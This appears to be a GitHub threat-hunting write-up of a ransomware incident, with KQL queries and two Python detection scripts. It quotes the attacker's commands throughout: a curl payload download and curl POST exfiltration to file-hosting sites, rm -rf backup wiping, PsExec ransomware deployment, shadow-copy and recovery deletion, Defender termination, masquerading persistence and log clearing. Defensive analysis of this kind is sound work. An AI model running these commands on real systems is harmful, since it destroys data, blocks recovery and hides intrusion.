GitHub: Rashwani/threat-hunting-Dead-in-the-Water
# Threat-hunting-Dead-in-the-Water
## Executive Summary
**Incident ID:** INC2025-1125-003
**Incident Severity:** Severity 1 (Critical)
**Incident Status:** Resolved
## Incident Overview
Following a confirmed compromise of the administrative workstation `azuki-adminpc`, the unauthorized entity leveraged the account `yuki.tanaka` to perform lateral movement via SSH to the Linux backup server `azuki-backupsrv` using the `backup-admin` service account. On the backup server, the attacker conducted systematic reconnaissance of backup directories, user accounts, and scheduled jobs. A destructive toolkit (`destroy.7z`) was downloaded from the anonymous file-hosting service `litter.catbox.moe`, and all backup data was wiped using `rm -rf`. The cron service was stopped and permanently disabled to prevent backup restoration.
The attacker then returned to the Windows environment, deploying the `silentlynx.exe` ransomware payload to three remote systems via `PsExec64.exe` over SMB admin shares using compromised domain credentials. Prior to encryption, all Windows recovery mechanisms were systematically eliminated — Volume Shadow Copy service stopped, backup engine halted, shadow copies deleted, shadow storage limited, Windows Recovery Environment disabled, and the backup catalog deleted. Security tools and file-locking applications were force-terminated to maximize encryption coverage. Persistence was established through a registry Run key and a scheduled task, both disguised as legitimate Windows security components. Anti-forensic techniques including USN journal deletion and event log clearing were employed to destroy evidence. The ransom note `SILENTLYNX_README.txt` was dropped on all encrypted systems.
## Key Findings
- The compromised account `yuki.tanaka` initiated SSH lateral movement from `azuki-adminpc` (IP: `10.1.0.108`) to the backup server at `10.1.0.189` using the `backup-admin` service account.
- On the Linux backup server, the attacker enumerated backup directories (`ls -la /backups/`), searched for backup archives (`find /backups -name *.tar.gz`), enumerated local accounts (`cat /etc/passwd`), reviewed scheduled jobs (`cat /etc/crontab`), and accessed stored credentials (`cat /backups/configs/all-credentials.txt`).
- A destructive toolkit was downloaded via `curl -L -o destroy.7z https://litter.catbox.moe/io523y.7z`.
- All 14 backup directories were destroyed with `rm -rf`, and the cron service was stopped (`systemctl stop cron`) and permanently disabled (`systemctl disable cron`).
- `PsExec64.exe` was used to deploy `silentlynx.exe` to three remote systems (`10.1.0.102`, `10.1.0.188`, `10.1.0.204`) using credentials for `kenji.sato` and `fileadmin`.
- Recovery inhibition included: `net stop VSS /y`, `net stop wbengine /y`, `vssadmin delete shadows /all /quiet`, `vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB`, `bcdedit /set {default} recoveryenabled No`, and `wbadmin delete catalog -quiet`.
- Windows Defender processes (`MsMpEng.exe`, `MpCmdRun.exe`, `NisSrv.exe`) and file-locking applications (`sqlservr.exe`, `mysql.exe`, `oracle.exe`, `postgres.exe`, `mongodb.exe`, `outlook.exe`, `excel.exe`, `winword.exe`) were force-terminated via `taskkill /F /IM`.
- Persistence was established via the registry value `WindowsSecurityHealth` under `CurrentVersion\Run` and a scheduled task at `Microsoft\Windows\Security\SecurityHealthService`.
- The USN journal was deleted (`fsutil.exe usn deletejournal /D C:`) and event logs were cleared on both `azuki-adminpc` and `azuki-sl`.
## Immediate Actions
The SOC and DFIR teams initiated incident response procedures upon detection. The compromised workstations and backup server were immediately isolated via network segmentation. The accounts `yuki.tanaka`, `backup-admin`, `kenji.sato`, and `fileadmin` were disabled in Active Directory. Firewall rules were updated to block all communications with `litter.catbox.moe` and associated IPs. All available event logs were preserved and collected by the existing SIEM for forensic analysis. The malicious scheduled task and registry persistence entries were removed from affected systems.
## Technical Analysis
### Affected Systems & Data
**Devices**
| Asset | Type | Role in Attack |
|-------|------|----------------|
| `azuki-adminpc` | Windows Workstation | Primary staging point, SSH pivot, PsExec deployment origin |
| `azuki-backupsrv` | Linux Server | Backup server — all backups destroyed |
| `azuki-sl` | Windows Server | Ransomware deployed via PsExec |
| `10.1.0.102` | Windows System | Ransomware deployed via PsExec |
| `10.1.0.188` | Windows System | Ransomware deployed via PsExec |
| `10.1.0.204` | Windows System | Ransomware deployed via PsExec |
**Accounts**
| Account | Usage |
|---------|-------|
| `yuki.tanaka` | Compromised domain account — initiated SSH lateral movement |
| `backup-admin` | Linux service account — used for SSH access to backup server |
| `kenji.sato` | Domain account — used for PsExec ransomware deployment |
| `fileadmin` | Domain account — used for PsExec ransomware deployment |
## Evidence Sources & Analysis
### Lateral Movement
#### Remote Access — SSH
Querying DeviceProcessEvents for SSH-related process executions on Azuki devices revealed the compromised account `yuki.tanaka` on `azuki-adminpc` initiating an SSH connection to the backup server at `10.1.0.189` using the `backup-admin` account. The parent process was `powershell.exe`, indicating a hands-on-keyboard session.
```kql
DeviceProcessEvents
| where DeviceName has "azuki"
| where ProcessCommandLine has "ssh"
| project TimeGenerated, DeviceName, AccountDomain, ProcessCommandLine, InitiatingProcessCommandLine
| order by TimeGenerated desc
```
A second query including the AccountName column confirmed the identity of the user executing the SSH command as `yuki.tanaka`, and the target account on the backup server as `backup-admin`.
```kql
DeviceProcessEvents
| where DeviceName has "azuki"
| where ProcessCommandLine has "ssh"
| project TimeGenerated, AccountName, DeviceName, AccountDomain, ProcessCommandLine, InitiatingProcessCommandLine
| order by TimeGenerated desc
```
#### Attack Source — Source IP
Querying DeviceNetworkEvents on `azuki-adminpc` filtered for SSH-related initiating process command lines revealed the source IP address of the lateral movement.
```kql
DeviceNetworkEvents
| where DeviceName == "azuki-adminpc"
| where InitiatingProcessCommandLine has_any ("ssh")
| project TimeGenerated, DeviceName, InitiatingProcessCommandLine, LocalIP
```
The SSH connection originated from local IP `10.1.0.108`, confirming `azuki-adminpc` as the attack source.
### Discovery
#### Directory Enumeration & Backup Archive Search
Querying DeviceProcessEvents filtered for `find` commands targeting `.tar.gz` files revealed the attacker searching for backup archives on the backup server.
```kql
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26))
| where DeviceName has "azuki"
| where ProcessCommandLine has "*.tar.gz"
| where FileName == "find"
| project TimeGenerated, DeviceName, ProcessCommandLine, InitiatingProcessCommandLine, FileName
```
At `11/24/2025, 2:16:06 PM`, the command `find /backups -name *.tar.gz` was executed from an interactive bash session (`-bash`), confirming hands-on-keyboard reconnaissance. Later at `5:47 AM` on Nov 25, the same `find` command was used as part of the destructive phase with `-exec rm -f {}` appended to delete found files.
#### Account Enumeration & Scheduled Job Reconnaissance
Querying DeviceProcessEvents for commands containing `cat`, `pass`, `less`, or `grep` revealed the attacker enumerating local accounts and reviewing scheduled backup jobs.
```kql
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26))
| where DeviceName has "azuki"
| where ProcessCommandLine has_any ("cat", "pass", "less", "grep")
| order by TimeGenerated desc
| project TimeGenerated, DeviceName, ProcessCommandLine
```
At `2:16:08 PM` on Nov 24, `cat /etc/passwd` was executed to enumerate all local user accounts, with the output piped through `grep --color=auto -v nologin` and `grep --color=auto -v false` to filter out service accounts and isolate interactive login accounts. At the same timestamp, `cat /etc/crontab` revealed all scheduled backup jobs.
A focused query for crontab specifically confirmed both `crontab -l` and `cat /etc/crontab` were executed:
```kql
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26))
| where DeviceName has "azuki"
| where ProcessCommandLine has ("crontab")
| order by TimeGenerated desc
| project TimeGenerated, DeviceName, ProcessCommandLine
```
### Credential Access
#### Stored Credentials
Querying DeviceProcessEvents for commands referencing `shadow`, `passwd`, or `cat` revealed the attacker accessing a plaintext credentials file stored in the backup directory structure.
```kql
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26))
| where DeviceName has "azuki"
| where ProcessCommandLine has_any ("shadow", "passwd", "cat")
| order by TimeGenerated desc
| project TimeGenerated, DeviceName, ProcessCommandLine
```
At `2:14:14 PM` on Nov 24, `cat /backups/configs/all-credentials.txt` was executed, reading a plaintext file containing stored credentials from the backup configuration directory. This file likely contained service account passwords, API keys, and other sensitive authentication material. The attacker also read `cat /backups/config-backups/network-config.txt` at `2:14:14 PM`.
### Command and Control — Tool Transfer
Querying DeviceProcessEvents for `curl` and `wget` commands across Azuki devices revealed the attacker downloading a destructive toolkit from an external anonymous file-hosting service.
```kql
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26))
| where DeviceName has "azuki"
| where ProcessCommandLine has_any ("curl", "wget")
| order by TimeGenerated desc
| project TimeGenerated, DeviceName, ProcessCommandLine
```
At `5:45:34 AM` on the backup server, `curl -L -o destroy.7z https://litter.catbox.moe/io523y.7z` was executed, downloading a compressed archive named `destroy.7z` from the anonymous file-hosting platform `litter.catbox.moe`. The `-L` flag follows HTTP redirects, and `-o` saves the file locally with the specified name.
This query also revealed exfiltration activity from `azuki-adminpc` via `curl.exe -X POST` commands uploading archived data (`banking-records.tar.gz`, `tax-documents.tar.gz`, `contracts-data.tar.gz`, `chrome-credentials.tar.gz`, `chrome-session-theft.tar.gz`) to `store1.gofile.io`.
### Impact — Data Destruction
Querying DeviceProcessEvents for destructive commands (`rm`, `shred`, `dd`) revealed the attacker wiping all backup data from the backup server.
```kql
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26))
| where DeviceName has "azuki"
| where ProcessCommandLine has_any ("rm", "shred", "dd")
| order by TimeGenerated desc
| project TimeGenerated, DeviceName, ProcessCommandLine
```
At `5:47:02 AM`, a single `rm -rf` command destroyed all 14 backup directories:
```bash
rm -rf /backups/archives /backups/azuki-adminpc /backups/azuki-fileserver /backups/azuki-logisticspc /backups/config-backups /backups/configs /backups/daily /backups/database-backups /backups/databases /backups/fileserver /backups/logs /backups/monthly /backups/weekly /backups/workstations
```
Additional `rm -rf` commands targeted `database-backups/*` and `config-backups/*` individually. A `find` command with `-exec rm -f {}` was also used to locate and delete remaining `.tar.gz`, `.tar`, `.zip`, and `.bak` files across the entire filesystem.
### Impact — Backup Service Stopped & Disabled
#### Service Stop
Querying DeviceProcessEvents on `azuki-backupsrv` for commands containing `stop` or `kill` revealed the attacker halting the cron scheduler.
```kql
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26))
| where DeviceName has "azuki-backupsrv"
| where ProcessCommandLine has_any ("stop", "kill")
| order by TimeGenerated desc
| project TimeGenerated, DeviceName, ProcessCommandLine
```
At `5:47:03 AM`, `systemctl stop cron` was executed to immediately halt the cron scheduler. This stopped all scheduled backup jobs from running.
#### Service Permanently Disabled
Querying for `disable` commands confirmed the attacker also prevented cron from starting on reboot.
```kql
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26))
| where DeviceName has "azuki-backupsrv"
| where ProcessCommandLine has_any ("disable")
| order by TimeGenerated desc
| project TimeGenerated, DeviceName, ProcessCommandLine
```
At `5:47:03 AM`, `systemctl disable cron` was executed. The results show the systemd SysV install scripts processing the disable command, confirming cron was permanently removed from the boot sequence.
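Detection logic for the backup-server activity in the two Impact sections above, as an added example that is not part of this report or of the queries it records. It runs three rules over DeviceProcessEvents-style records constructed from the command lines quoted in this report: a recursive `rm` whose targets sit under the backup root (with a count of the directories it would remove), a `find ... -exec rm` or `-delete` sweep, and `systemctl stop/disable/mask` of the scheduler. `BACKUP_ROOT`, `CRITICAL_UNITS` and the exact `find -exec` record are assumptions.

```python
"""Rule-based detection of backup destruction and scheduler tampering on a Linux
backup host, run over DeviceProcessEvents-style records.

Added example (not part of the original report). EVENTS is constructed from the
command lines quoted in the report; BACKUP_ROOT and CRITICAL_UNITS are assumptions.
"""
import shlex

BACKUP_ROOT = "/backups"            # assumption: where the backup data lives
CRITICAL_UNITS = {"cron", "crond"}  # assumption: units whose loss stops backup jobs

# Constructed telemetry, modelled on the command lines quoted in the report.
EVENTS = [
    {"DeviceName": "azuki-backupsrv", "InitiatingProcessCommandLine": "-bash",
     "ProcessCommandLine": "ls -la /backups/"},
    {"DeviceName": "azuki-backupsrv", "InitiatingProcessCommandLine": "-bash",
     "ProcessCommandLine": "find /backups -name *.tar.gz"},
    {"DeviceName": "azuki-backupsrv", "InitiatingProcessCommandLine": "-bash",
     "ProcessCommandLine": "rm -rf /backups/archives /backups/azuki-adminpc "
                           "/backups/azuki-fileserver /backups/azuki-logisticspc "
                           "/backups/config-backups /backups/configs /backups/daily "
                           "/backups/database-backups /backups/databases "
                           "/backups/fileserver /backups/logs /backups/monthly "
                           "/backups/weekly /backups/workstations"},
    {"DeviceName": "azuki-backupsrv", "InitiatingProcessCommandLine": "-bash",
     "ProcessCommandLine": "rm -rf /backups/database-backups/*"},
    # constructed: the report describes a find ... -exec rm -f {} sweep over archive files
    {"DeviceName": "azuki-backupsrv", "InitiatingProcessCommandLine": "-bash",
     "ProcessCommandLine": "find / -name *.tar.gz -exec rm -f {} \\;"},
    {"DeviceName": "azuki-backupsrv", "InitiatingProcessCommandLine": "-bash",
     "ProcessCommandLine": "systemctl stop cron"},
    {"DeviceName": "azuki-backupsrv", "InitiatingProcessCommandLine": "-bash",
     "ProcessCommandLine": "systemctl disable cron"},
]


def _argv(cmdline):
    """Tokenise like a POSIX shell; fall back to whitespace on unbalanced quotes."""
    try:
        return shlex.split(cmdline)
    except ValueError:
        return cmdline.split()


def _basename(token):
    return token.rsplit("/", 1)[-1]


def backup_targets_of_recursive_rm(cmdline):
    """Paths under BACKUP_ROOT that a recursive rm would remove ([] if not applicable)."""
    argv = _argv(cmdline)
    if not argv or _basename(argv[0]) != "rm":
        return []
    flags = [a for a in argv[1:] if a.startswith("-")]
    recursive = any(f == "--recursive" or (not f.startswith("--") and set("rR") & set(f))
                    for f in flags)
    if not recursive:
        return []
    targets = [a for a in argv[1:] if not a.startswith("-")]
    return [t for t in targets if t == BACKUP_ROOT or t.startswith(BACKUP_ROOT + "/")]


def is_find_exec_rm(cmdline):
    """True for find ... -exec rm|shred ... and for find ... -delete."""
    argv = _argv(cmdline)
    if not argv or _basename(argv[0]) != "find":
        return False
    for i, a in enumerate(argv):
        if a == "-delete":
            return True
        if a in ("-exec", "-execdir") and i + 1 < len(argv) \
                and _basename(argv[i + 1]) in ("rm", "shred"):
            return True
    return False


def scheduler_tampering(cmdline):
    """(action, [units]) when systemctl stops/disables/masks a critical unit, else None."""
    argv = _argv(cmdline)
    if len(argv) < 3 or _basename(argv[0]) != "systemctl" \
            or argv[1] not in ("stop", "disable", "mask"):
        return None
    units = {u.removesuffix(".service") for u in argv[2:] if not u.startswith("-")}
    hit = sorted(units & CRITICAL_UNITS)
    return (argv[1], hit) if hit else None


def analyze(events):
    """Run every rule over the records and return one finding per match."""
    findings = []
    for ev in events:
        cmd, dev = ev["ProcessCommandLine"], ev["DeviceName"]
        targets = backup_targets_of_recursive_rm(cmd)
        if targets:
            findings.append({"rule": "recursive_rm_backups", "device": dev,
                             "detail": {"count": len(targets), "targets": targets}})
        if is_find_exec_rm(cmd):
            findings.append({"rule": "find_exec_rm", "device": dev, "detail": {"command": cmd}})
        tamper = scheduler_tampering(cmd)
        if tamper:
            findings.append({"rule": "scheduler_tampering", "device": dev,
                             "detail": {"action": tamper[0], "units": tamper[1]}})
    return findings


if __name__ == "__main__":
    for f in analyze(EVENTS):
        print(f["device"], f["rule"], f["detail"])
```

Running the file prints one line per finding; the `ls` and plain `find` records produce nothing, while the fourteen-directory `rm -rf` is reported with its count so an analyst can see the blast radius without reading the whole command line.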
### Lateral Movement — Remote Execution via PsExec
Querying DeviceProcessEvents on `azuki-adminpc` for PsExec-related activity revealed the attacker deploying the ransomware payload to multiple remote systems.
```kql
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26))
| where ProcessCommandLine contains "psexec"
    or InitiatingProcessCommandLine contains "psexec"
    or FileName contains "psexec"
| project TimeGenerated, FileName, DeviceName, ProcessCommandLine
```
Four PsExec executions were observed:
| Timestamp | Command | Target |
|-----------|---------|--------|
| 5:58:35 AM | `"PsExec64.exe" /accepteula` | EULA acceptance (first run) |
| 6:03:47 AM | `"PsExec64.exe" \\10.1.0.102 -u kenji.sato -p ********* -c -f C:\Windows\Temp\cache\silentlynx.exe` | 10.1.0.102 |
| 6:04:40 AM | `"PsExec64.exe" \\10.1.0.188 -u fileadmin -p ********* -c -f C:\Windows\Temp\cache\silentlynx.exe` | 10.1.0.188 |
| 6:05:46 AM | `"PsExec64.exe" \\10.1.0.204 -u kenji.sato -p ********* -c -f C:\Windows\Temp\cache\silentlynx.exe` | 10.1.0.204 |
The `-c` flag copies the executable to the remote system, and `-f` forces overwrite if it already exists.
A second query filtered for `FileName endswith "PsExec64.exe"` confirmed the same results and highlighted the payload name `silentlynx.exe`:
```kql
DeviceProcessEvents
| where DeviceName has "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26))
| where FileName endswith "PsExec64.exe"
| order by TimeGenerated desc
| project TimeGenerated, FileName, DeviceName, ProcessCommandLine
```
A broader deployment query also revealed Robocopy.exe staging financial documents prior to exfiltration:
```kql
DeviceProcessEvents
| where DeviceName has "azuki"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26))
| where ProcessCommandLine has_any ("copy", "xcopy", "robocopy", "ADMIN$", "C$", "\\\\")
| order by TimeGenerated desc
| project TimeGenerated, FileName, DeviceName, ProcessCommandLine
```
### Recovery Inhibition
#### Shadow Copy Service & Backup Engine Stopped
Querying DeviceProcessEvents on `azuki-adminpc` for service stop commands revealed systematic disabling of all Windows backup and recovery services.
```kql
DeviceProcessEvents
| where DeviceName has "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26))
| where ProcessCommandLine has_any ("stop", "kill", "vss")
| order by TimeGenerated desc
| project TimeGenerated, FileName, DeviceName, ProcessCommandLine
```
A focused query for `wbengine` confirmed the backup engine was also stopped:
```kql
DeviceProcessEvents
| where DeviceName has "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26))
| where ProcessCommandLine has_any ("stop", "kill", "wbengine")
| order by TimeGenerated desc
| project TimeGenerated, FileName, DeviceName, ProcessCommandLine
```
Services stopped in rapid succession at 6:04 AM:
| Timestamp | Command | Purpose |
|-----------|---------|---------|
| 6:04:53 AM | `"net" stop VSS /y` | Stop Volume Shadow Copy Service |
| 6:04:54 AM | `"net" stop wbengine /y` | Stop Windows Backup Engine |
| 6:04:54 AM | `"net" stop SDRSVC /y` | Stop System Restore Service |
| 6:04:55 AM | `"net" stop WinDefend /y` | Stop Windows Defender |
| 6:04:55 AM | `"net" stop wscsvc /y` | Stop Windows Security Center |
#### Process Termination — Unlock Files
Querying for `taskkill`, `kill`, and `pkill` commands revealed the attacker force-terminating security tools and file-locking applications.
```kql
DeviceProcessEvents
| where DeviceName has "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26))
| where ProcessCommandLine has_any ("taskkill", "kill ", "pkill")
| order by TimeGenerated desc
| project TimeGenerated, FileName, DeviceName, ProcessCommandLine
```
Security tools killed at 5:31 AM:
- `"taskkill.exe" /F /IM MsMpEng.exe` — Windows Defender Antimalware Engine
- `"taskkill.exe" /F /IM MpCmdRun.exe` — Defender Command-Line Tool
- `"taskkill.exe" /F /IM NisSrv.exe` — Defender Network Inspection Service
File-locking processes killed at 6:04 AM (within 2 seconds — indicating automated execution):
- `"taskkill" /F /IM sqlservr.exe` — Microsoft SQL Server
- `"taskkill" /F /IM mysql.exe` — MySQL
- `"taskkill" /F /IM oracle.exe` — Oracle Database
- `"taskkill" /F /IM postgres.exe` — PostgreSQL
- `"taskkill" /F /IM mongodb.exe` — MongoDB
- `"taskkill" /F /IM outlook.exe` — Microsoft Outlook
- `"taskkill" /F /IM excel.exe` — Microsoft Excel
- `"taskkill" /F /IM winword.exe` — Microsoft Word
#### Recovery Point Deletion
Querying for `delete` and `shadow` commands revealed the attacker deleting all existing shadow copies.
```kql
DeviceProcessEvents
| where DeviceName has "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26))
| where ProcessCommandLine has_any ("delete", "shadow")
| order by TimeGenerated desc
| project TimeGenerated, FileName, DeviceName, ProcessCommandLine
```
At `5:58:55 AM`, `"vssadmin.exe" delete shadows /all /quiet` was executed, deleting all Volume Shadow Copies. This was executed again at `6:04:59 AM`. The same query also revealed `"wbadmin" delete catalog -quiet` at `6:04:59 AM`, deleting the Windows backup catalog.
#### Storage Limitation
Querying for `vssadmin` and `shadowstorage` commands revealed the attacker limiting shadow copy storage to prevent new recovery points.
```kql
DeviceProcessEvents
| where DeviceName has "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26))
| where ProcessCommandLine has_any ("vssadmin ", "shadowstorage ")
| order by TimeGenerated desc
| project TimeGenerated, FileName, DeviceName, ProcessCommandLine
```
At `5:59:56 AM`, `"vssadmin.exe" resize shadowstorage /for=C: /on=C: /maxsize=401MB` was executed, reducing shadow copy storage to 401MB — effectively preventing any new recovery points from being created.
#### System Recovery Disabled
Querying for `reagentc` and `bcdedit` commands confirmed the attacker disabled the Windows Recovery Environment.
```kql
DeviceProcessEvents
| where DeviceName has "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26))
| where ProcessCommandLine has_any ("reagentc", "bcdedit")
| order by TimeGenerated desc
| project TimeGenerated, FileName, DeviceName, ProcessCommandLine
```
At `6:04:59 AM`, `"bcdedit" /set {default} recoveryenabled No` was executed, disabling the Windows Recovery Environment at the boot configuration level.
#### Backup Catalog Deletion
The same deletion query also revealed the backup catalog being wiped:
```kql
DeviceProcessEvents
| where DeviceName has "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26))
| where ProcessCommandLine has_any ("rm", "delete")
| order by TimeGenerated desc
| project TimeGenerated, FileName, DeviceName, ProcessCommandLine
```
At `6:04:59 AM`, `"wbadmin" delete catalog -quiet` was executed, deleting the Windows backup catalog which tracks all available restore points and backup versions.
### Persistence
#### Registry Run Key
Querying DeviceRegistryEvents on `azuki-adminpc` for `RegistryValueSet` actions targeting the `CurrentVersion\Run` key revealed the attacker establishing persistence via a registry autorun entry.
```kql
DeviceRegistryEvents
| where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26))
| where DeviceName == "azuki-adminpc"
| where ActionType == "RegistryValueSet"
| where RegistryKey has @"CurrentVersion\Run"
| project Timestamp, RegistryKey, RegistryValueName, RegistryValueData
```
At `6:05:01 AM`, a registry value named `WindowsSecurityHealth` was set under `HKEY_CURRENT_USER\S-1-5-21-...\Software\Microsoft\Windows\CurrentVersion\Run`. This ensures the ransomware payload executes automatically on every user logon. A second entry `SystemHealthMonitor` was also observed at `5:36:33 AM`. Both names mimic legitimate Windows security components to avoid detection.
#### Scheduled Task
Querying DeviceProcessEvents for `schtasks` in the InitiatingProcessCommandLine revealed the attacker creating scheduled tasks on multiple systems.
```kql
DeviceProcessEvents
| where TimeGenerated between (datetime(2025-11-25) .. datetime(2025-11-26))
| where DeviceName has "azuki"
| where InitiatingProcessCommandLine has "schtasks"
| project TimeGenerated, DeviceName, ProcessCommandLine, InitiatingProcessCommandLine
```
At `6:05:01 AM` on `azuki-adminpc` and `6:07:10 AM` on `azuki-sl`, the following scheduled task was created:
```cmd
"schtasks" /create /tn "Microsoft\Windows\Security\SecurityHealthService" /tr "C:\Windows\Temp\cache\silentlynx.exe" /sc onlogon /rl highest /f
```
The task path `Microsoft\Windows\Security\SecurityHealthService` mimics the legitimate Windows Security Health service. The `/sc onlogon` trigger ensures execution at every user logon, and `/rl highest` runs it with the highest available privileges.
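Both persistence mechanisms in this section rely on the same trick: a name that looks like a built-in Windows security component pointing at a binary in a user-writable directory. The following is an added example, not part of this report, of two rules that key on that mismatch rather than on specific names. `parse_schtasks` pulls the `/tn` and `/tr` values out of a `schtasks` command line; `analyze` flags a `/create` whose task name sits under the Windows-owned `Microsoft\Windows\` folder but whose action runs from a temp or profile path, and a `CurrentVersion\Run` value whose name borrows security vocabulary and whose data points at such a path. The registry value data, the benign records, the keyword list and the user-writable path list are assumptions; the report gives only the value name `WindowsSecurityHealth`.

```python
"""Detect persistence entries that masquerade as Windows security components.

Added example (not part of the original report). The registry value data, the
benign records, LOOKALIKE_WORDS and the user-writable path lists are assumptions.
"""
import shlex

BUILTIN_TASK_FOLDERS = ("microsoft\\windows\\",)   # task folders owned by Windows
USER_WRITABLE_PREFIXES = ("c:\\windows\\temp\\", "c:\\users\\", "c:\\programdata\\")
USER_WRITABLE_MARKERS = ("%temp%", "%appdata%", "%localappdata%", "\\appdata\\")
LOOKALIKE_WORDS = ("security", "health", "defender", "update", "system")  # assumption

EVENTS = [
    {"table": "DeviceProcessEvents", "DeviceName": "azuki-adminpc",
     "ProcessCommandLine": r'"schtasks" /create /tn "Microsoft\Windows\Security\SecurityHealthService" '
                           r'/tr "C:\Windows\Temp\cache\silentlynx.exe" /sc onlogon /rl highest /f'},
    {"table": "DeviceProcessEvents", "DeviceName": "azuki-sl",
     "ProcessCommandLine": r'"schtasks" /create /tn "Microsoft\Windows\Security\SecurityHealthService" '
                           r'/tr "C:\Windows\Temp\cache\silentlynx.exe" /sc onlogon /rl highest /f'},
    # constructed benign task: vendor folder, binary under Program Files
    {"table": "DeviceProcessEvents", "DeviceName": "azuki-adminpc",
     "ProcessCommandLine": r'"schtasks" /create /tn "Backup\Nightly" /tr "C:\Program Files\Backup\run.exe" /sc daily /st 02:00'},
    {"table": "DeviceRegistryEvents", "DeviceName": "azuki-adminpc",
     "RegistryKey": r"HKEY_CURRENT_USER\S-1-5-21-...\Software\Microsoft\Windows\CurrentVersion\Run",
     "RegistryValueName": "WindowsSecurityHealth",
     "RegistryValueData": r"C:\Windows\Temp\cache\silentlynx.exe"},  # data is an assumption
    # constructed benign autorun: ordinary name, even though it lives under the profile
    {"table": "DeviceRegistryEvents", "DeviceName": "azuki-adminpc",
     "RegistryKey": r"HKEY_CURRENT_USER\S-1-5-21-...\Software\Microsoft\Windows\CurrentVersion\Run",
     "RegistryValueName": "OneDrive",
     "RegistryValueData": r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
]


def _tokens(cmdline):
    """Split a Windows command line keeping backslashes intact; strip surrounding quotes."""
    return [t.strip('"') for t in shlex.split(cmdline, posix=False)]


def first_exe(action):
    """The executable from a task action or Run value (quotes and arguments removed)."""
    toks = _tokens(action)
    return toks[0] if toks else ""


def is_user_writable(path):
    p = path.lower()
    return p.startswith(USER_WRITABLE_PREFIXES) or any(m in p for m in USER_WRITABLE_MARKERS)


def parse_schtasks(cmdline):
    """Verb and switch values of a schtasks command line, or None if it is not schtasks."""
    toks = _tokens(cmdline)
    if not toks or toks[0].lower().rsplit("\\", 1)[-1] not in ("schtasks", "schtasks.exe"):
        return None
    opts, i = {}, 1
    while i < len(toks):
        t = toks[i].lower()
        if t in ("/create", "/delete", "/change", "/run", "/query", "/end"):
            opts["verb"] = t[1:]
            i += 1
        elif t in ("/tn", "/tr", "/sc", "/rl", "/ru", "/rp", "/st", "/sd", "/mo",
                   "/s", "/u", "/p") and i + 1 < len(toks):
            opts[t[1:]] = toks[i + 1]
            i += 2
        else:
            opts[t.lstrip("/")] = True   # bare switches such as /f
            i += 1
    return opts


def analyze(events):
    """Apply the two masquerade rules and return one finding per match."""
    findings = []
    for ev in events:
        if ev["table"] == "DeviceProcessEvents":
            opts = parse_schtasks(ev["ProcessCommandLine"])
            if (opts and opts.get("verb") == "create"
                    and opts.get("tn", "").lower().startswith(BUILTIN_TASK_FOLDERS)
                    and is_user_writable(first_exe(opts.get("tr", "")))):
                findings.append({"rule": "task_path_masquerade", "device": ev["DeviceName"],
                                 "task": opts["tn"], "action": first_exe(opts["tr"]),
                                 "trigger": opts.get("sc"), "runlevel": opts.get("rl")})
        elif ev["table"] == "DeviceRegistryEvents":
            name = ev["RegistryValueName"].lower()
            if ("currentversion\\run" in ev["RegistryKey"].lower()
                    and any(w in name for w in LOOKALIKE_WORDS)
                    and is_user_writable(first_exe(ev["RegistryValueData"]))):
                findings.append({"rule": "run_key_masquerade", "device": ev["DeviceName"],
                                 "value": ev["RegistryValueName"],
                                 "target": first_exe(ev["RegistryValueData"])})
    return findings


if __name__ == "__main__":
    for f in analyze(EVENTS):
        print(f)
```

The `OneDrive` record shows why both conditions are required: its binary also lives under a user profile, but the value name carries no security vocabulary, so it is left alone, whereas the `WindowsSecurityHealth` value and the `SecurityHealthService` task on both hosts are reported.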
### Defense Evasion — Anti-Forensics
#### Journal Deletion & Log Clearing
Querying DeviceProcessEvents for `fsutil`, `usn`, `deletejournal`, and `wevtutil` commands revealed the attacker destroying forensic evidence on multiple systems.
```kql
DeviceProcessEvents
| where DeviceName has "azuki"
| where TimeGenerated between (datetime(2025-11-25) .. datetime(2025-11-26))
| where ProcessCommandLine has_any ("fsutil", "usn", "deletejournal", "wevtutil")
| project TimeGenerated, DeviceName, ProcessCommandLine, InitiatingProcessCommandLine
```
On `azuki-adminpc` at `6:10 AM` (initiated by `powershell.exe`):
- `"fsutil.exe" usn deletejournal /D C:` — Deleted the NTFS USN journal, which records every file creation, deletion, and modification on the volume.
- `"wevtutil.exe" cl Security` — Cleared the Windows Security event log.
- `"wevtutil.exe" cl System` — Cleared the Windows System event log.
On `azuki-sl` at `6:07 AM` (initiated by `silentlynx.exe`):
- `"wevtutil" cl "Security"` — Cleared Security log.
- `"wevtutil" cl "System"` — Cleared System log.
- `"wevtutil" cl "Application"` — Cleared Application log.
- `"wevtutil" cl "Microsoft-Windows-PowerShell/Operational"` — Cleared PowerShell operational log.
Notably, on `azuki-sl` the InitiatingProcessCommandLine was `silentlynx.exe`, confirming the ransomware payload itself contains built-in anti-forensic capabilities.
